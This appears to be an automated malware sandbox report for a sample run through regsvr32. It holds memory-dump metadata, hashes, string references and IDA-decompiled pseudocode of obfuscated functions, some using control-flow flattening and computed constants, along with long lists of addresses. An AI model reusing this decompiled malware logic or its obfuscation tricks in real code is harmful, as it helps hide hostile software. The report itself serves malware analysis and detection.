0x04f69cc4
0x04f69ccc
0x04f69cd4
0x04f69cdc
0x04f69ce2
0x00000000
0x04f69c53
0x04f69c58
0x00000000
0x04f69c5e
0x04f69c5e
0x04f69c66
0x04f69c73
0x04f69c77
0x04f69c8e
0x04f69c93
0x00000000
0x04f69c93
0x04f69c58
0x04f69c51
0x04f69c46
0x04f69c3b
0x04f69c33
0x04f69dd4
0x04f69ddf
0x04f69ddf
0x04f69d90
0x04f69d98
0x04f69d9d
0x04f69da2
0x04f69daa
0x04f69dbb
0x04f69dbd
0x04f69dbf
0x04f69dbf
0x00000000

Strings

C., xrefs: 04F69BF4
yzX!, xrefs: 04F69CD4

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C.$yzX!
API String ID: 0-1067861304
Opcode ID: 413477c7e37663d8e2eeee76c88b9fc6a3159da578a48a81d2a20cae5dfda6e7
Instruction ID: 4cd93ecffd2ee38472a5d4c4b5ea0d504fefede5d244ccb610326c6711b513f3
Opcode Fuzzy Hash: 413477c7e37663d8e2eeee76c88b9fc6a3159da578a48a81d2a20cae5dfda6e7
Instruction Fuzzy Hash: BD4109B15093828BC324CF18D54941BBBE0FB90748F040E2EF5A597250D7F9DA4E9B97

Uniqueness

Uniqueness Score: -1.00%

Function 04F74658 Relevance: 2.6, Strings: 2, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04F74658(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				void* _t114;
				void* _t118;
				signed int _t122;
				signed int _t132;
				void* _t134;

				_push(_a20);
				_push(_a16);
				_v28 = 0x104;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E04F732C4(0x104);
				_v24 = 0x8bda1;
				_v20 = 0x1517d;
				_t134 = 0;
				_v8 = 0xa9e7eb;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x3e1cdc16;
				_v8 = _v8 ^ 0xbf9fec16;
				_v20 = 0x618e1c;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00cf03a6;
				_v12 = 0xc6fe75;
				_v12 = _v12 ^ 0x162ef318;
				_t132 = 0x7f;
				_v12 = _v12 / _t132;
				_v12 = _v12 ^ 0x00206c6a;
				_v16 = 0xf986bd;
				_v16 = _v16 ^ 0x24513253;
				_v16 = _v16 ^ 0x24a0faac;
				_t114 = E04F7362E(_v8, __ecx);
				_t133 = _t114;
				if(_t114 != 0) {
					_v16 = 0xe5861;
					_v16 = _v16 + 0x51b8;
					_v16 = _v16 + 0xffe;
					_v16 = _v16 ^ 0x000d3ea7;
					_v8 = 0xd5a9ca;
					_v8 = _v8 + 0xc533;
					_v8 = _v8 << 2;
					_v8 = _v8 + 0xffffba58;
					_v8 = _v8 ^ 0x03579419;
					_v12 = 0x7d22cf;
					_t122 = 0x71;
					_v12 = _v12 / _t122;
					_v12 = _v12 + 0xffff4d97;
					_v12 = _v12 ^ 0x00005437;
					_v20 = 0x988412;
					_v20 = _v20 | 0xe3a6b7a3;
					_v20 = _v20 ^ 0xe3bb19f0;
					_t118 = E04F6FF59( &_v28, _v16, _v8, _v12, _t133, _a4, _t122, _v20);
					_v12 = 0xe35a22;
					_v12 = _v12 | 0x439e00b0;
					_t134 = _t118;
					_v12 = _v12 + 0x5ac8;
					_v12 = _v12 + 0x3fe9;
					_v12 = _v12 ^ 0x43fc57d2;
					_v8 = 0xbcf762;
					_v8 = _v8 ^ 0xd8734201;
					_v8 = _v8 << 0xc;
					_v8 = _v8 | 0xd265e340;
					_v8 = _v8 ^ 0xfb7cf1d4;
					_v16 = 0x16d988;
					_v16 = _v16 + 0xffffd962;
					_v16 = _v16 + 0xffffacea;
					_v16 = _v16 ^ 0x001d2952;
					E04F68B6C(_v12, _t133, _v8, _v16);
				}
				return _t134;
			}

0x04f74660
0x04f74668
0x04f7466b
0x04f7466e
0x04f74671
0x04f74674
0x04f74677
0x04f74678
0x04f74679
0x04f7467e
0x04f74687
0x04f7468e
0x04f74690
0x04f74697
0x04f7469b
0x04f746a2
0x04f746a9
0x04f746b0
0x04f746b3
0x04f746ba
0x04f746c1
0x04f746cd
0x04f746d5
0x04f746d8
0x04f746df
0x04f746e6
0x04f746ed
0x04f74700
0x04f74705
0x04f7470c
0x04f74712
0x04f7471b
0x04f74722
0x04f74729
0x04f74730
0x04f74737
0x04f7473e
0x04f74742
0x04f74749
0x04f74750
0x04f7475c
0x04f7475f
0x04f74762
0x04f74769
0x04f74770
0x04f74777
0x04f7477e
0x04f74799
0x04f7479e
0x04f747a7
0x04f747ae
0x04f747b0
0x04f747b7
0x04f747be
0x04f747c5
0x04f747cc
0x04f747d3
0x04f747d7
0x04f747de
0x04f747e5
0x04f747ec
0x04f747f3
0x04f747fa
0x04f7480a
0x04f7480f
0x04f74819

Strings

S2Q$, xrefs: 04F746E6
"Z, xrefs: 04F7479E

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: "Z$S2Q$
API String ID: 2591292051-812837102
Opcode ID: e437a562b7a35ab793cb126c58466dc105bdedef870f8a3e0dcaad9bbec4157f
Instruction ID: 64323ec1b5a6b6977a9d0b0b8c1d7cd96324a447e5689a9ac568b2a6a50e294c
Opcode Fuzzy Hash: e437a562b7a35ab793cb126c58466dc105bdedef870f8a3e0dcaad9bbec4157f
Instruction Fuzzy Hash: 2151EFB1D00219EBDF58CFE5D9498DEBBB1FB40318F208199E421B6260D7B95B95DF40

Uniqueness

Uniqueness Score: -1.00%

Function 04F7001B Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04F7001B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t63;
				void* _t65;
				void* _t75;
				void* _t91;
				intOrPtr _t92;
				void* _t94;
				void* _t95;

				_push(_a16);
				_t91 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t63);
				_t95 = _t94 + 0x18;
				_v44 = 0x7a17d;
				_t92 = 0;
				_t65 = 0x99c9;
				_v40 = 0;
				while(_t65 != 0x8809) {
					if(_t65 == 0x99c9) {
						_t65 = 0x8809;
						continue;
					} else {
						if(_t65 == 0x162dd) {
							_v52 = 0x8f0cb5;
							_v52 = _v52 << 6;
							_v52 = _v52 * 0x62;
							_v52 = _v52 ^ 0xb0b1411c;
							_v48 = 0x5f1847;
							_v48 = _v48 << 0xc;
							_v48 = _v48 ^ 0xf1829e14;
							__eflags = E04F6D362(_v52, _v48, __eflags,  &_v36, _t91 + 0xc);
							_t92 =  !=  ? 1 : _t92;
						} else {
							if(_t65 != 0x7d1f3) {
								L9:
								__eflags = _t65 - 0xaa5f8;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_v48 = 0xe3f040;
								_v48 = _v48 >> 0xd;
								_v48 = _v48 ^ 0x0007043c;
								_v52 = 0xb05c73;
								_v52 = _v52 << 0xc;
								_v52 = _v52 + 0xffffea1c;
								_v52 = _v52 ^ 0x05ce7c6a;
								_v56 = 0xf05525;
								_v56 = _v56 + 0x5258;
								_v56 = _v56 << 6;
								_v56 = _v56 ^ 0x3c21990f;
								_t75 = E04F7BF19(_v48, _t91 + 0x24, _v52,  &_v36, _v56);
								_t95 = _t95 + 0xc;
								if(_t75 != 0) {
									_t65 = 0x162dd;
									continue;
								}
							}
						}
					}
					return _t92;
				}
				_v52 = 0xdbbaac;
				_v52 = _v52 * 0x46;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x50b2e1e8;
				_v48 = 0x276806;
				_v48 = _v48 ^ 0xe9324a2b;
				_t43 =  &_v48;
				 *_t43 = _v48 ^ 0xe9130b87;
				__eflags =  *_t43;
				E04F80484(_v52, _a4,  &_v36, _v48);
				_t65 = 0x7d1f3;
				goto L9;
			}

0x04f70022
0x04f70026
0x04f70028
0x04f7002c
0x04f70030
0x04f70034
0x04f70035
0x04f70036
0x04f7003b
0x04f7003e
0x04f70046
0x04f70048
0x04f7004d
0x04f7005b
0x04f70068
0x04f700fb
0x00000000
0x04f7006e
0x04f70070
0x04f70162
0x04f7016a
0x04f70174
0x04f7017b
0x04f70183
0x04f7018b
0x04f70190
0x04f701b0
0x04f701b2
0x04f70076
0x04f7007b
0x04f70155
0x04f70155
0x04f7015a
0x00000000
0x00000000
0x04f70160
0x04f70081
0x04f70081
0x04f7008d
0x04f70095
0x04f7009d
0x04f700a5
0x04f700aa
0x04f700b2
0x04f700ba
0x04f700c2
0x04f700ca
0x04f700cf
0x04f700e4
0x04f700e9
0x04f700ee
0x04f700f4
0x00000000
0x04f700f4
0x04f700ee
0x04f7007b
0x04f70070
0x04f701be
0x04f701be
0x04f70106
0x04f70113
0x04f7011b
0x04f70120
0x04f70128
0x04f70130
0x04f70138
0x04f70138
0x04f70138
0x04f70149
0x04f70150
0x00000000

Strings

+J2, xrefs: 04F70130
XR, xrefs: 04F700C2

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +J2$XR
API String ID: 0-869452771
Opcode ID: cc9994f21a787d14a4098edaa203aa6089e6a77287181fb8892b934c4296ded5
Instruction ID: 1727834af7586d8a839cd57433b9fd6010c81536be925e38d1c744cd79fa9947
Opcode Fuzzy Hash: cc9994f21a787d14a4098edaa203aa6089e6a77287181fb8892b934c4296ded5
Instruction Fuzzy Hash: CF4124725083029FC314CF64D88941BBBE4EF94798F10891EF59596261D7B8EA4ECF93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6FBDD Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

J|, xrefs: 04F6FCB2
[j, xrefs: 04F6FC37

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: J|$[j
API String ID: 0-353672830
Opcode ID: 9c96938612d63ab374f394102c5fb3a743f316af282c88b2bfc61204ec10cb87
Instruction ID: d82a94c291f55ed94e48790079be012558f358fb632030d43e893ddce8b2e0fa
Opcode Fuzzy Hash: 9c96938612d63ab374f394102c5fb3a743f316af282c88b2bfc61204ec10cb87
Instruction Fuzzy Hash: FA410475900208FBDF45DFA4C98989EBFB1AF50344F20C099E905AA260D7B4AB99DF80

Uniqueness

Uniqueness Score: -1.00%

Function 10021F04 Relevance: 1.9, APIs: 1, Instructions: 440
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E10021F04(intOrPtr* __ecx) {
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				unsigned int _t150;
				signed int _t152;
				signed int _t156;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				unsigned int _t163;
				signed int _t167;
				signed int _t171;
				unsigned int _t174;
				signed int _t175;
				signed int _t179;
				signed int _t180;
				signed int* _t184;
				signed int _t186;
				signed int _t194;
				unsigned int _t204;
				void* _t206;

				_t187 = __ecx;
				E10011A8C(E1002A969, _t206);
				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
				_t179 =  *(_t206 + 8);
				_t201 = __ecx;
				if(_t179 != 0x111) {
					if(_t179 != 0x4e) {
						_t204 =  *(_t206 + 0x10);
						if(_t179 == 6) {
							E10021931(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E10020A8C(_t206, _t204));
						}
						if(_t179 != 0x20) {
							L10:
							_t141 =  *(_t201 + 0x48);
							if(_t141 == 0) {
								L19:
								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
								 *(_t206 - 0x14) = _t180;
								E100286A3(7);
								_t184 = 0x100381d0 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
								_t146 =  *(_t206 - 0x14);
								if( *(_t206 + 8) !=  *_t184) {
									L24:
									 *_t184 =  *(_t206 + 8);
									_t184[2] = _t146;
									while(1) {
										if(_t146 == 0) {
											break;
										}
										_t147 =  *(_t206 - 0x14);
										_push(0);
										_push(0);
										if( *(_t206 + 8) >= 0xc000) {
											_t148 =  *(_t147 + 4);
											while(1) {
												_push(0xc000);
												_push(_t148);
												_t149 = E1001F843();
												 *(_t206 + 0x10) = _t149;
												if(_t149 == 0) {
													break;
												}
												_t150 =  *(_t206 + 0x10);
												_t152 =  *(_t206 + 0x10);
												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
													_t184[1] = _t152;
													E10028706(7);
													L105:
													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
													L106:
													 *(_t206 - 0x10) = _t156;
													goto L107;
												}
												_push(0);
												_push(0);
												_t148 = _t152 + 0x18;
											}
											L34:
											_t146 =  *( *(_t206 - 0x14));
											 *(_t206 - 0x14) = _t146;
											continue;
										}
										_push( *(_t206 + 8));
										_push( *(_t147 + 4));
										_t161 = E1001F843();
										 *(_t206 + 0x10) = _t161;
										if(_t161 == 0) {
											goto L34;
										}
										_t184[1] = _t161;
										E10028706(7);
										L28:
										_t163 =  *(_t206 + 0x10);
										_t184 =  *(_t163 + 0x14);
										_t147 =  *(_t163 + 0x10);
										_t194 =  *(_t163 + 0x10) - 1;
										if(_t194 > 0x40) {
											goto L107;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M1002240B))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10024DD7());
												goto L55;
											case 1:
												_push( *(__ebp + 0xc));
												goto L55;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E10020A8C(__ebp,  *(__ebp + 0xc));
												goto L59;
											case 3:
												_push(__esi);
												__eax = E10020A8C(__ebp,  *(__ebp + 0xc));
												goto L84;
											case 4:
												_push(__esi);
												L55:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 5:
												__ecx = __ebp - 0x24;
												E10024A4D(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E10020085(__ebp - 0x74, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x58) = __eax;
												__eax = E10020AB3();
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x48);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E1001DD3F(__eax + 0x20,  *(__ebp - 0x58));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x74;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x10) = __ebp - 0x24;
												 *(__ebp - 4) = 0;
												__eax = E10021189(__ebp - 0x74);
												goto L51;
											case 6:
												__ecx = __ebp - 0x24;
												E10024A4D(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												_t89 = __ebp - 0x20;
												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
												__eflags =  *_t89;
												 *(__ebp - 0x10) = __ebp - 0x24;
												L51:
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												__eax = E10024E4D(__ebp - 0x24);
												goto L107;
											case 7:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10020A8C(__ebp, __esi);
												goto L58;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L84;
											case 9:
												_push(__esi);
												_push( *(__ebp + 0xc));
												goto L85;
											case 0xa:
												_push(__esi);
												_push(E100241F7());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L58:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L59:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xb:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L91;
											case 0xd:
												_push(__esi);
												goto L88;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L63;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L63;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E10020A8C(__ebp, __esi));
												L88:
												_push( *(__ebp + 0xc));
												goto L89;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x13:
												_push(E10020A8C(__ebp,  *(__ebp + 0xc)));
												_push(E10020A8C(__ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												__eflags = _t107;
												__eax = 0 | _t107;
												goto L67;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10024DD7();
												goto L69;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E100241F7();
												goto L69;
											case 0x16:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E100241F7();
												goto L67;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L74;
											case 0x18:
												_push(__esi);
												L74:
												__eax = E10020A8C(__ebp);
												L69:
												_push(__eax);
												goto L91;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L77;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L77:
												_push(__eax);
												__eax = E10020A8C(__ebp,  *(__ebp + 0xc));
												goto L67;
											case 0x1b:
												_push(__esi);
												__eax = E10020A8C(__ebp,  *(__ebp + 0xc));
												L63:
												_push(__eax);
												goto L89;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10020A8C(__ebp, __esi);
												goto L93;
											case 0x1d:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x27;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __cx;
												 *(__ebp + 0xc) = __cx;
												if(__eax != 0x27) {
													_push( *(__ebp + 0xc));
													_push( *((intOrPtr*)(__ebp + 8)));
													L89:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L107;
												}
												_push(E10020A8C(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L98;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L84:
												_push(__eax);
												L85:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L93:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L67:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x23:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L100:
												__eflags = _t175;
												if(_t175 != 0) {
													goto L107;
												}
												goto L37;
											case 0x24:
												goto L107;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L107;
												}
												L37:
												_t159 = 0;
												__eflags = 0;
												goto L38;
										}
									}
									_t54 =  &(_t184[1]);
									 *_t54 = _t184[1] & _t146;
									E10028706(7);
									goto L37;
								}
								if(_t146 != _t184[2]) {
									goto L24;
								}
								_t186 = _t184[1];
								 *(_t206 + 0x10) = _t186;
								E10028706(7);
								if(_t186 == 0) {
									goto L37;
								}
								if( *(_t206 + 8) < 0xc000) {
									goto L28;
								}
								goto L105;
							}
							if( *(_t141 + 0x70) <= 0) {
								goto L19;
							}
							if(_t179 < 0x200) {
								L14:
								if(_t179 < 0x100) {
									L16:
									if(_t179 < 0x281) {
										goto L19;
									}
									if(_t179 > 0x291) {
										goto L19;
									}
									L18:
									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
									if(_t167 != 0) {
										goto L107;
									}
									goto L19;
								}
								if(_t179 <= 0x10f) {
									goto L18;
								}
								goto L16;
							}
							if(_t179 <= 0x209) {
								goto L18;
							}
							goto L14;
						} else {
							_t171 = E10021992(_t201, _t204, _t204 >> 0x10);
							if(_t171 != 0) {
								L98:
								 *(_t206 - 0x10) = 1;
								L107:
								_t157 =  *(_t206 + 0x14);
								if(_t157 != 0) {
									 *_t157 =  *(_t206 - 0x10);
								}
								_t159 = 1;
								L38:
								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
								return _t159;
							}
							goto L10;
						}
					}
					_t174 =  *(_t206 + 0x10);
					if( *_t174 == 0) {
						goto L37;
					}
					_push(_t206 - 0x10);
					_push(_t174);
					_push( *((intOrPtr*)(_t206 + 0xc)));
					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L100;
				}
				_push( *(_t206 + 0x10));
				_push( *((intOrPtr*)(_t206 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L37;
				}
				goto L98;
			}

0x10021f04
0x10021f09
0x10021f11
0x10021f16
0x10021f21
0x10021f23
0x10021f43
0x10021f6b
0x10021f6e
0x10021f7b
0x10021f7b
0x10021f83
0x10021f9d
0x10021f9d
0x10021fa2
0x10021ff6
0x10021ffd
0x10021fff
0x1002200d
0x10022018
0x10022021
0x10022024
0x1002204e
0x10022051
0x10022053
0x100220dd
0x100220df
0x00000000
0x00000000
0x10022062
0x10022065
0x10022067
0x10022069
0x100220a3
0x100220c3
0x100220c3
0x100220c8
0x100220c9
0x100220d0
0x100220d3
0x00000000
0x00000000
0x100220a8
0x100220b3
0x100220b6
0x100223de
0x100223e1
0x100223e6
0x100223f2
0x100223f4
0x100223f4
0x00000000
0x100223f4
0x100220bc
0x100220be
0x100220c0
0x100220c0
0x100220d5
0x100220d8
0x100220da
0x00000000
0x100220da
0x1002206b
0x1002206e
0x10022071
0x10022078
0x1002207b
0x00000000
0x00000000
0x1002207f
0x10022082
0x10022087
0x10022087
0x1002208a
0x1002208d
0x10022090
0x10022096
0x00000000
0x00000000
0x1002209c
0x00000000
0x10022102
0x1002210a
0x00000000
0x00000000
0x10022110
0x00000000
0x00000000
0x10022129
0x1002212a
0x1002212d
0x10022131
0x00000000
0x00000000
0x1002213b
0x1002213f
0x00000000
0x00000000
0x1002220f
0x10022210
0x10022210
0x10022212
0x00000000
0x00000000
0x10022149
0x10022151
0x10022154
0x10022158
0x1002215b
0x1002215e
0x10022163
0x10022165
0x10022168
0x10022169
0x1002216d
0x10022170
0x10022175
0x10022177
0x10022179
0x1002217c
0x1002217e
0x10022183
0x10022186
0x1002218b
0x1002218d
0x1002218f
0x1002218f
0x1002218d
0x10022192
0x10022192
0x10022195
0x10022196
0x10022197
0x1002219a
0x1002219b
0x1002219d
0x1002219f
0x100221a3
0x100221a7
0x100221aa
0x100221ad
0x100221b1
0x00000000
0x00000000
0x100221b8
0x100221c0
0x100221c3
0x100221c6
0x100221c9
0x100221cc
0x100221cd
0x100221cf
0x100221d6
0x100221d8
0x100221d8
0x100221d8
0x100221dc
0x100221df
0x100221df
0x100221e3
0x100221e6
0x00000000
0x00000000
0x100221f3
0x100221f6
0x100221f8
0x00000000
0x00000000
0x10022202
0x10022205
0x10022206
0x00000000
0x00000000
0x10022219
0x1002221a
0x00000000
0x00000000
0x10022222
0x10022228
0x10022229
0x1002222c
0x1002222c
0x1002222f
0x1002222f
0x10022230
0x10022234
0x10022234
0x10022235
0x10022237
0x00000000
0x00000000
0x1002223e
0x10022240
0x00000000
0x00000000
0x10022247
0x00000000
0x00000000
0x1002235b
0x00000000
0x00000000
0x1002224f
0x10022252
0x10022252
0x10022255
0x10022256
0x00000000
0x00000000
0x10022262
0x10022265
0x10022268
0x10022269
0x00000000
0x00000000
0x10022273
0x10022274
0x00000000
0x00000000
0x1002211e
0x1002235c
0x1002235c
0x00000000
0x00000000
0x10022352
0x10022354
0x00000000
0x00000000
0x10022284
0x1002228b
0x1002228c
0x1002228e
0x10022291
0x10022291
0x10022291
0x00000000
0x00000000
0x1002229a
0x1002229d
0x00000000
0x00000000
0x100222a8
0x100222ab
0x00000000
0x00000000
0x100222b7
0x100222b8
0x100222bb
0x100222bc
0x100222bf
0x00000000
0x00000000
0x100222c6
0x00000000
0x00000000
0x100222cb
0x100222cc
0x100222cc
0x100222a2
0x100222a2
0x00000000
0x00000000
0x100222d8
0x100222d9
0x00000000
0x00000000
0x100222de
0x100222e1
0x100222e4
0x100222e7
0x100222e8
0x100222e8
0x100222ec
0x00000000
0x00000000
0x100222f3
0x100222f7
0x1002225a
0x1002225a
0x00000000
0x00000000
0x10022304
0x10022307
0x10022309
0x00000000
0x00000000
0x10022316
0x10022319
0x1002231c
0x1002231f
0x10022322
0x10022325
0x10022336
0x10022339
0x1002235f
0x1002235f
0x10022361
0x00000000
0x10022361
0x1002232d
0x1002232e
0x10022331
0x00000000
0x00000000
0x10022368
0x10022369
0x10022369
0x1002236b
0x00000000
0x00000000
0x10022397
0x10022398
0x1002239b
0x1002239d
0x00000000
0x00000000
0x1002233e
0x10022341
0x10022344
0x10022347
0x10022348
0x10022348
0x10022349
0x10022349
0x1002234b
0x00000000
0x00000000
0x10022372
0x10022375
0x10022376
0x10022376
0x10022379
0x10022379
0x1002237a
0x10022294
0x10022294
0x00000000
0x00000000
0x10022383
0x10022386
0x10022389
0x1002238c
0x1002238d
0x1002238d
0x1002238e
0x10022391
0x10022391
0x10022393
0x00000000
0x00000000
0x100223a8
0x100223ae
0x100223af
0x100223b0
0x100223b3
0x100223b3
0x100223b6
